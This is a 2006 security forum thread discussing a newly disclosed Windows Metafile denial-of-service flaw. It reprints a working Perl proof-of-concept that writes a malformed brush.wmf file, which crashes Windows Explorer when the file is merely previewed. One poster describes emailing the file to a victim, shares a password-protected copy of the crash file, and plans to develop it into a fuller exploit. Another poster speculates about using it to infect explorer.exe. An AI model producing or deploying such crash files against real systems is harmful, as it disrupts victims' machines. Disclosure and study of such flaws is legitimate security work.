New 0-day WMF "Exploit"

[HTRegz]

Hey Hey,

First off... you'll noticed I put exploit in quotes... I haven't investigated this yet.... That's my plan for this evening... It's a crash which means a DoS.... whether you consider that an exploit or not is up to you...

Here's the original posting from FD

Posted by: cyanid-E <biz4rre@gmail.com>
Description:

yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.

Exploit:

=== begin of brush.pl ===
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait \n";
=== end of brush.pl ===

Just run brush.pl and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).

Discovered:

06/24/2006; vendor informed but not answered

I'll keep people informed as I play with it...

Peace,
HT

[jockey0109]

But friend ... (I think I will take some time rmembering and getting used to names of members on this forum)...

The Exploit I think needs a perl enterpreter installed into tthe system or else it is not going to work. Anyway .... What the WMF exploit is? I dunno anything about "WMF". The name is first I heard here. Can someone explain this thing to me....hopefully you will explain it better than the rest HTregz.

~Jockey

[HTRegz]

Originally posted here by jockey0109
But friend ... (I think I will take some time rmembering and getting used to names of members on this forum)...

The Exploit I think needs a perl enterpreter installed into tthe system or else it is not going to work. Anyway .... What the WMF exploit is? I dunno anything about "WMF". The name is first I heard here. Can someone explain this thing to me....hopefully you will explain it better than the rest HTregz.

~Jockey

G'Day,

The code in the above generates a .wmf, the .wmf contains the exploit. WMF is the Windows Metafile Format, you should be quite familiar with it, it caused quite a commotion over Christmas when a 0-day was released without any prior notification to Microsoft and during most people's holidays... It was MS06-001 (the first Patch of this year). This is another flaw in the same filetype, the PoC will crash explorer.exe on load (so viewing it in Explorer because of preview is enough to do it). Right now it is simply a DoS... but a fellow researcher and myself will be playing with it later in the week to see if we can take it beyond that and turn it into a full exploit. So no perl is not required on the system, perl is only required by the malicious user.

Peace,
HT

[jockey0109]

Hey HT, Thanks a lot for that and I personally think that the file can be used for so many advanced purposes like even making an application infect explorer.exe. I am not sure but his should work:

1. The script will call upon the infection program
2. the infetion program looks for the termination of explorer.exe . after the program starts successfully, the rest of the code crashes explorere and in the next instance of explorer, the infection program will have changed the file ( while the file was not in use).

However i think that it shud be a tough tak doing that coz explorer is file whose integrity is always checked!

Also, you didnt answer one of my questions : Will the file also infect the PCs which dont know how to handle perl??? I preassume an affirmitive response coz as you say, the script creats the WMF file which does the job in turn! However the creation of this file is p[ossible only on machines which understand how to handle the script in perl!! ...... or am I wrong somewhere???

[HTRegz]

Originally posted here by jockey0109

Also, you didnt answer one of my questions : Will the file also infect the PCs which dont know how to handle perl??? I preassume an affirmitive response coz as you say, the script creats the WMF file which does the job in turn! However the creation of this file is p[ossible only on machines which understand how to handle the script in perl!! ...... or am I wrong somewhere???

I answered that question with this line:

So no perl is not required on the system, perl is only required by the malicious user.

The exploit exists in WMF.... it has nothing to do with perl... perl is being used to write the malicious file... I can write the malicious file and that is all that is needed to crash a system... I write the malicious file, attach it to an email and send it to a Windows user... they get the email, view the attachment and bang... their system crashes... No need for them to have perl because perl has nothing to do with the actual exploit..

[wildred]

I compiled the above code and ran the wmf file it dropped on my xp sp2 machine. No crashes what so ever. This was both by viewing the file in IE and via Windows Picture and Fax Viewer. My machine is fully patched including the newest Patch Tuesday releases.

[HTRegz]

Originally posted here by wildred
I compiled the above code and ran the wmf file it dropped on my xp sp2 machine. No crashes what so ever. This was both by viewing the file in IE and via Windows Picture and Fax Viewer. My machine is fully patched including the newest Patch Tuesday releases.

Then I'm guessing you really aren't sure about what you are doing... There's no code to compile... You drop the perl (you have to account for the smilies) into a script, execute the script and it creates a WMF... THat WMF doesn't even need to be opened in an application... just present in an explorer Window...

I have repeatedly tested it and it definately crashes, even with the latest patches installed...

While it goes against my better judgement, since the script to generate this is freely available on the mailing lists and since it is simply a DoS it won't do a lot of harm... The password on the zip file is antionline.com (unless I typo'd it... it was ****'s with no confirm box). It will crash explorer as soon as it's displayed in a file window (not sure if it will inside the zip but it definately will if you extract it and then "View extracted files")..

Peace,
HT

[wildred]

Call it what you want..compiled etc. I ran the script, the script dropped a WMF file. I ran the file. No crash. ActivePerl was what I used to run the code. I accounted for the smiles too. Sorry for the incorrect lingo.

[HTRegz]

Originally posted here by wildred
Call it what you want..compiled etc. I ran the script, the script dropped a WMF file. I ran the file. No crash. ActivePerl was what I used to run the code. I accounted for the smiles too. Sorry for the incorrect lingo.

You didn't say if this one crashed your box or not...

[jockey0109]

well HTRegz...I want to download the file but I am not sure if it will INFECT my PC, make it useless or do something extrememyly harmful....and one more thing :

How do I remove it from the explorer...I mean how do I delete it form my computer after ai make sure that I crashes the computer??? I know explorer wont help...will the DOS come handy???

And I ask you a simple question : I have heard a lot about GDI ... Hopefully it stands for "GRPAHICS DISPLAY _______ " ( please fill in the blanks) and explain what it is.

Another request : can you tell me the proper functioning of this file...I mean I want to know what exactly is the role of the Windows MEtadata file??? And how does it affect windows explorer??

~Jockey